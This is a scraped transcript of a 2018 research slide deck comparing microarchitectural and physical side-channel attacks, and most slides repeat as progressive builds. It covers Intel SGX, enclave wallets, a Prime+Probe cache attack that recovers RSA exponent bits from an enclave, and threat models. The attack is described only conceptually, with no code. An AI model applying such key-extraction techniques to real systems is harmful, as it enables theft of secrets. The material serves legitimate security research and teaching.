(Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations...
Transcript of (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations...
![Page 1: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/1.jpg)
(Why) Are Microarchitectural Attacks Really
Different than Physical Side-Channel Attacks?
Daniel Gruss
September 10, 2018
Graz University of Technology
1 Daniel Gruss — Graz University of Technology
![Page 2: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/2.jpg)
![Page 3: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/3.jpg)
![Page 4: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/4.jpg)
![Page 5: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/5.jpg)
![Page 6: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/6.jpg)
![Page 7: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/7.jpg)
![Page 8: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/8.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 9: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/9.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 10: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/10.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 11: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/11.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 12: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/12.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 13: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/13.jpg)
Stealing Bitcoins? www.tugraz.at
SGX
2 Daniel Gruss — Graz University of Technology
![Page 14: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/14.jpg)
SGX www.tugraz.at
Application
Untrusted part
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 15: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/15.jpg)
SGX www.tugraz.at
Application
Untrusted part
Create Enclave
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 16: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/16.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Trusted Fnc.
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 17: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/17.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
Trusted Fnc.
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 18: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/18.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
Trusted Fnc.
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 19: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/19.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
Trusted Fnc.
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 20: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/20.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
Trusted Fnc.
Return
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 21: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/21.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
Trusted Fnc.
Return
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 22: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/22.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
. . .
Trusted Fnc.
Return
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 23: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/23.jpg)
SGX www.tugraz.at
Application
Trusted part
Cal
lG
ate
Untrusted part
Create Enclave
Call Trusted Fnc.
. . .
Trusted Fnc.
Return
Operating System
3 Daniel Gruss — Graz University of Technology
![Page 24: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/24.jpg)
Intel SGX Developer Guide www.tugraz.at
Protection from Side-Channel Attacks
Intel SGX does not provide explicit protection from side-channel attacks. It is the
enclave developer’s responsibility to address side-channel attack concerns.
4 Daniel Gruss — Graz University of Technology
![Page 25: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/25.jpg)
Intel SGX Developer Guide www.tugraz.at
Protection from Side-Channel Attacks
Intel SGX does not provide explicit protection from side-channel attacks. It is the
enclave developer’s responsibility to address side-channel attack concerns.
4 Daniel Gruss — Graz University of Technology
![Page 26: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/26.jpg)
Intel SGX Developer Guide www.tugraz.at
Protection from Side-Channel Attacks
Intel SGX does not provide explicit protection from side-channel attacks.
It is the
enclave developer’s responsibility to address side-channel attack concerns.
4 Daniel Gruss — Graz University of Technology
![Page 27: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/27.jpg)
Intel SGX Developer Guide www.tugraz.at
Protection from Side-Channel Attacks
Intel SGX does not provide explicit protection from side-channel attacks. It is the
enclave developer’s responsibility to address side-channel attack concerns.
4 Daniel Gruss — Graz University of Technology
![Page 28: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/28.jpg)
![Page 29: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/29.jpg)
SGX Wallets www.tugraz.at
• Ledger SGX Enclave for blockchain applications
• BitPay Copay Bitcoin wallet
• Teechain payment channel using SGX
Teechain
[...] We assume the TEE guarantees to hold and do not
consider side-channel attacks [5, 35, 46] on the TEE. Such
attacks and their mitigations [36, 43] are outside the scope of
this work. [...]
5 Daniel Gruss — Graz University of Technology
![Page 30: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/30.jpg)
SGX Wallets www.tugraz.at
• Ledger SGX Enclave for blockchain applications
• BitPay Copay Bitcoin wallet
• Teechain payment channel using SGX
Teechain
[...] We assume the TEE guarantees to hold
and do not
consider side-channel attacks [5, 35, 46] on the TEE. Such
attacks and their mitigations [36, 43] are outside the scope of
this work. [...]
5 Daniel Gruss — Graz University of Technology
![Page 31: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/31.jpg)
SGX Wallets www.tugraz.at
• Ledger SGX Enclave for blockchain applications
• BitPay Copay Bitcoin wallet
• Teechain payment channel using SGX
Teechain
[...] We assume the TEE guarantees to hold and do not
consider side-channel attacks [5, 35, 46] on the TEE.
Such
attacks and their mitigations [36, 43] are outside the scope of
this work. [...]
5 Daniel Gruss — Graz University of Technology
![Page 32: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/32.jpg)
SGX Wallets www.tugraz.at
• Ledger SGX Enclave for blockchain applications
• BitPay Copay Bitcoin wallet
• Teechain payment channel using SGX
Teechain
[...] We assume the TEE guarantees to hold and do not
consider side-channel attacks [5, 35, 46] on the TEE. Such
attacks and their mitigations [36, 43] are outside the scope of
this work. [...]
5 Daniel Gruss — Graz University of Technology
![Page 33: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/33.jpg)
Attacking a weak RSA implementation inside SGX www.tugraz.at
Raw Prime+Probe trace...1
1Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In:
DIMVA. 2017.
6 Daniel Gruss — Graz University of Technology
![Page 34: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/34.jpg)
Attacking a weak RSA implementation inside SGX www.tugraz.at
...processed with a simple moving average...2
2Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In:
DIMVA. 2017.
7 Daniel Gruss — Graz University of Technology
![Page 35: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/35.jpg)
Attacking a weak RSA implementation inside SGX www.tugraz.at
...allows to clearly see the bits of the exponent3
1 1 1 00 1 1 1 01 1 1 00000001 000 1 0 1 00 1 1 00 1 1 01 1 1 1 1 0 1 1 1 1 0 1 000 1 00 1 1 1 0 1 000 1 1 1 0000 1 1 1
3Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache Attacks. In:
DIMVA. 2017.
8 Daniel Gruss — Graz University of Technology
![Page 36: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/36.jpg)
![Page 37: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/37.jpg)
![Page 38: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/38.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 39: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/39.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 40: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/40.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 41: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/41.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 42: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/42.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 43: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/43.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 44: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/44.jpg)
Physical Side Channels www.tugraz.at
• Power consumption [KJJ99; MOP08]
• Electro-magnetic radiation [RR01; KS09]
• Temperature [HS13]
• Photonic emission [Sch+12; CSW17]
• Acoustic emissions [Bac+10]
→ Physical access usually relevant, but code execution on device
usually not relevant
9 Daniel Gruss — Graz University of Technology
![Page 45: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/45.jpg)
![Page 46: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/46.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 47: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/47.jpg)
Microarchitectural Attacks www.tugraz.at
1996
2004 2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 48: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/48.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004
2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 49: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/49.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006
2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 50: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/50.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009
2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 51: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/51.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 52: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/52.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 53: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/53.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 54: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/54.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 55: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/55.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013
2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 56: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/56.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 57: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/57.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 58: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/58.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 59: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/59.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014
2015
10 Daniel Gruss — Graz University of Technology
![Page 60: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/60.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 61: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/61.jpg)
Microarchitectural Attacks www.tugraz.at
1996 2004 2006 2009 2011
2013 2014 2015
10 Daniel Gruss — Graz University of Technology
![Page 62: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/62.jpg)
Microarchitectural Attacks www.tugraz.at
2016 2017 2018
11 Daniel Gruss — Graz University of Technology
![Page 63: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/63.jpg)
Microarchitectural Attacks www.tugraz.at
2016
2017 2018
11 Daniel Gruss — Graz University of Technology
![Page 64: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/64.jpg)
Microarchitectural Attacks www.tugraz.at
2016 2017
2018
11 Daniel Gruss — Graz University of Technology
![Page 65: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/65.jpg)
Microarchitectural Attacks www.tugraz.at
2016 2017 2018
11 Daniel Gruss — Graz University of Technology
![Page 66: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/66.jpg)
Differences and Similarities www.tugraz.at
• threat model
• temporal component
• observer effect (destructive measurements)
• spatial component
12 Daniel Gruss — Graz University of Technology
![Page 67: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/67.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 68: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/68.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 69: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/69.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
![Page 70: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/70.jpg)
Microarchitectural Attacks - Threat Model www.tugraz.at
• Usually no physical access
• Local code
• Co-located code
• Different meanings of “remote”
1. Attacker controls code in browser sandbox (e.g., [Ore+15;
GMM16])
2. Attacker cannot control any code on the system
13 Daniel Gruss — Graz University of Technology
